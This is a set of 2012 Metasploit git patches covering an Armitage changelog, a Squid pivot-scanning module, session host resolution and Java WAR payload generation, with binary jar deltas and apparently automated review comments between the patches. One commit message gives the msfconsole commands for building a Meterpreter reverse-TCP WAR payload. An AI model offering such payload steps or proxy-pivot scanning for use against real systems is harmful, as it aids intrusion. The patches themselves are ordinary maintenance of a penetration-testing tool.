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 DNS Enumerate now populates NS field with highlighted host. 
+- Armitage now adds a tooltip to tabs associated with a session. Hover your + mouse over a tab X button to see which host the tab is associated with. +- Fixed a potential exception caused when listing downloads. +- Created a queue to process certain commands meant for Metasploit in order and + in a throttled manner. Started moving some Armitage calls to it. Now you can + fire an exploit at 1,000 hosts and Armitage won't blink. It might take awhile + before that exploit finishes firing against all of the hosts though :) +- The file browser now has a "List Drives" button. It's only available on + Windows sessions. Click it to see which drives are available. +- File browser can now navigate to folders with apostrophes in their name. +- Made some major internal changes to how Armitage interacts with Metasploit. The + goal is to make a more robust and faster hacking experience for you. + 22 Mar 12 --------- - Updated Armitage NMap profiles with the following: From 0fcab521d22dc395bb2b6d259dc56a90ea3c5cb4 Mon Sep 17 00:00:00 2001 From: Willis Vandevanter Date: Wed, 28 Mar 2012 02:32:03 -0400 Subject: [PATCH 41/46] fixed print_bad --- modules/auxiliary/scanner/http/squid_pivot_scanning.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index e1de4e497c..60effdf61a 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary end if res.body =~ /No route to host/ dead = true - print_bad("[#{rhost}] #{target} is DEAD") + print_error("[#{rhost}] #{target} is DEAD") end print_status("[#{rhost}] #{target}:#{port} blocked by ACL") if res.body =~ /Access control/ From e522b4046518d6100e8ee6756e4c2b6e7e52f7c9 Mon Sep 17 00:00:00 2001 
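Review bot: `dead = true`, in the context just above the changed line, is never cleared anywhere in this hunk. If `dead` is still initialised once before the target loop, as in the first version of this module, a single unreachable target makes `next if dead` skip every later target, and the results silently under-report. Resetting it per target, with `dead = false` as the first statement inside `iplist.each do |target|`, would confine the skip to the host that actually failed. `res.body` is also used here without a visible nil check on `res`; any guard for that lies outside the hunk.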
From: James Lee Date: Wed, 28 Mar 2012 13:33:10 -0600 Subject: [PATCH 42/46] Make sure session.target_host gets resolved Not sure why this isn't already resolved when we read it out of the datastore. May have something to do with the recent options madness. [Fixes #6567] --- lib/msf/core/session.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/session.rb b/lib/msf/core/session.rb index 71a90130a2..4f3fd9d060 100644 --- a/lib/msf/core/session.rb +++ b/lib/msf/core/session.rb @@ -260,7 +260,7 @@ module Session def set_from_exploit(m) self.via = { 'Exploit' => m.fullname } self.via['Payload'] = ('payload/' + m.datastore['PAYLOAD'].to_s) if m.datastore['PAYLOAD'] - self.target_host = m.target_host if (m.target_host.to_s.strip.length > 0) + self.target_host = Rex::Socket.getaddress(m.target_host) if (m.target_host.to_s.strip.length > 0) self.target_port = m.target_port if (m.target_port.to_i != 0) self.workspace = m.workspace self.username = m.owner From 016ba1613dc8d8ad0e829ce1572195062f1f556a Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Tue, 27 Mar 2012 22:43:50 +0200 Subject: [PATCH 43/46] fix generating war files for Java payloads from within msfconsole This fixes this use case: use payload/java/meterpreter/reverse_tcp generate -t war -f filename.war --- lib/msf/base/simple/payload.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index 05fdc18934..b9f4f1e785 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -74,6 +74,10 @@ module Payload len = e.encoded.length + if arch.index(ARCH_JAVA) and fmt == 'war' + return e.encoded_war.pack + end + output = Msf::Util::EXE.to_executable_fmt(framework, arch, plat, e.encoded, fmt, exeopts) if not output From f5e05461f69e114e9643a117a649ae81b425d58e Mon Sep 17 00:00:00 2001 
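Review bot: The added `Rex::Socket.getaddress(m.target_host)` call performs a name lookup with no handling for a failed lookup, so an unresolvable host would presumably raise out of `set_from_exploit` before `target_port`, `workspace` and `username` are assigned. The guard also strips the value for the emptiness test but hands the unstripped string to the resolver. I would resolve the stripped value, keep the raw one when the lookup fails, and add a comment saying why resolution happens here, since the commit message itself says the cause is not understood. `set_from_exploit` continues past the end of the hunk.

```ruby
def set_from_exploit(m)
	# … unchanged: via / Payload assignment …
	host = m.target_host.to_s.strip
	unless host.empty?
		begin
			# Store an address rather than a hostname; keep the raw value if the lookup fails.
			self.target_host = Rex::Socket.getaddress(host)
		rescue ::SocketError
			self.target_host = host
		end
	end
	# … unchanged: target_port, workspace, username …
```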
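Review bot: The new early return has no comment explaining why a Java payload with `fmt == 'war'` bypasses `Msf::Util::EXE.to_executable_fmt` and the `if not output` check that follows it. If the reason is that `encoded_war` already builds the complete archive, a line such as `# Java payloads build their own WAR archive, so skip the generic executable formatter` above the `if` would record that. The condition also uses `and`, whose low precedence is a common trap; `if arch.index(ARCH_JAVA) && fmt == 'war'` reads the same and is safer. The enclosing method starts and ends outside the hunk.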
From: Willis Vandevanter
Date: Wed, 28 Mar 2012 22:18:56 -0400
Subject: [PATCH 44/46] changed the false positive check IP to a user set variable
---
 modules/auxiliary/scanner/http/squid_pivot_scanning.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb
index 60effdf61a..03fd0493d8 100644
--- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb
+++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb
@@ -48,7 +48,8 @@ class Metasploit3 < Msf::Auxiliary
 [
 OptString.new('RANGE', [true, "IPs to scan through Squid proxy", '']),
 OptString.new('PORTS', [true, "Ports to scan; must be TCP", "21,80,139,443,445,1433,1521,1723,3389,8080,9100"]),
- OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true])
+ OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true]),
+ OptString.new('CANARY_IP',[true,"The IP to check if the proxy always answers positively; the IP should not respond.","1.2.3.4"])
 ], self.class)
 end
@@ -65,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary
 manual = false
 #request a non-existent page first to make sure the server doesn't respond with a 200 to everything.
 res_test = send_request_cgi({
- 'uri' => "http://127.0.11.1:80",
+ 'uri' => "http://{datastore['CANARY_IP']}:80",
 'method' => 'GET',
 'data' => '',
 'version' => '1.0',
From 28483711e7c76f18a1808f0576eaf59203d36ae7 Mon Sep 17 00:00:00 2001
From: Raphael Mudge
Date: Thu, 29 Mar 2012 01:00:03 -0400
Subject: [PATCH 45/46] initialize a console before connecting to db (forces msf to setup the database for user)
---
 data/armitage/armitage.jar | Bin 2868473 -> 2868524 bytes
 data/armitage/whatsnew.txt | 5 +++++
 2 files changed, 5 insertions(+)
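Review bot: `CANARY_IP` is registered as an `OptString` with the default `"1.2.3.4"`, which is a routable public address, so every run left on defaults makes the proxy contact a third-party host. A string option also means a mistyped value is not caught until the request is built. An address option with a reserved documentation default avoids both: `OptAddress.new('CANARY_IP', [true, "The IP to check if the proxy always answers positively; the IP should not respond.", "192.0.2.1"])` (192.0.2.0/24 is TEST-NET-1, RFC 5737). The `register_options(` call opens above the hunk.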
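Review bot: The new `'uri'` value is missing the `#` of the string interpolation, so the literal text `http://{datastore['CANARY_IP']}:80` is requested and `CANARY_IP` is never used. The false-positive check then depends on how the proxy handles a malformed URL rather than on a host that should not answer. The line should read `'uri' => "http://#{datastore['CANARY_IP']}:80",`. The `send_request_cgi` call continues past the end of the hunk.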
diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 02e92a3125c73293742abad4176a30ecd5fb8bf5..52adf6076e974e29ae04d3eb89df544279ac60fd 100755 GIT binary patch delta 18143 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 
